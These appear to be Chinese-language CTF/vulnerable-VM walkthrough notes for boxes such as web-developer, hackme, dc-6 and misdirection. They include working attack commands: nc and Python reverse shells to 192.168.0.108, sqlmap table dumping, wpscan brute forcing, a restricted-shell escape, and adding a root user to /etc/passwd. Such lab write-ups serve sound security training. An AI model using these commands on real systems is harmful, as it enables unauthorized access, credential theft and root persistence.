目录
web-developer-1,288
1.端口扫描
2.NC远程登录JAMES-Admin
3.nc远程登录Pop3,查看邮件信息
mindy用户下有ssh登录信息
4.登录ssh,发现mindy是个受限制的shell
v
ssh 192.168.0.109 -l mindy "export TERM=xterm; python -c 'import pty; pty.spawn(\"/bin/sh\")'"
5.提权
echo 'import os; os.system("/bin/nc 192.168.0.108 5588 -e /bin/bash")' > /opt/tmp.py
python tmp.py
hackme-1,330
1.端口扫描
2.注册登录用户后搜索页面存在sql注入漏洞
sqlmap -r 1.txt -D webapphacking -T users --columns --dump-all --batch
登录超级管理员后发现存在上传页面
3.上传php文件
4.提权
dc-6,315
1.添加hosts
2.枚举wordpress用户名,爆破密码
wpscan --url http://wordy/ --enumerate
cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt
wc -l passwords.txt
wpscan --url http://wordy -U name.txt -P passwords.txt
3.activity monitor漏洞利用
更改exp
4.查找敏感文件,发现graham密码
5.查看jens下的反弹shell
graham@dc-6:/home/jens$ cat /dev/null > backups.sh
graham@dc-6:/home/jens$ echo "/bin/bash" >> backups.sh
graham@dc-6:/home/jens$ sudo -u jens ./backups.sh #jens用户执行sh脚本文件即可获取shel
6.nmap提权
misdirection-1,371
1.端口扫描
2.爆破web目录
http://192.168.0.104:8080/debug/是一个shell
3.反弹shell
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.108",9999));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
修改passwd文件
brexit@misdirection:/etc$ openssl passwd -1 123456
openssl passwd -1 123456
$1$9NYamCnE$3NdQF1dU1bfbo1MTayr0H1
brexit@misdirection:/etc$ echo 'abc:$1$9NYamCnE$3NdQF1dU1bfbo1MTayr0H1:0:0::/root:/bin/bash' >> /etc/passwd
<1bfbo1MTayr0H1:0:0::/root:/bin/bash' >> /etc/passwd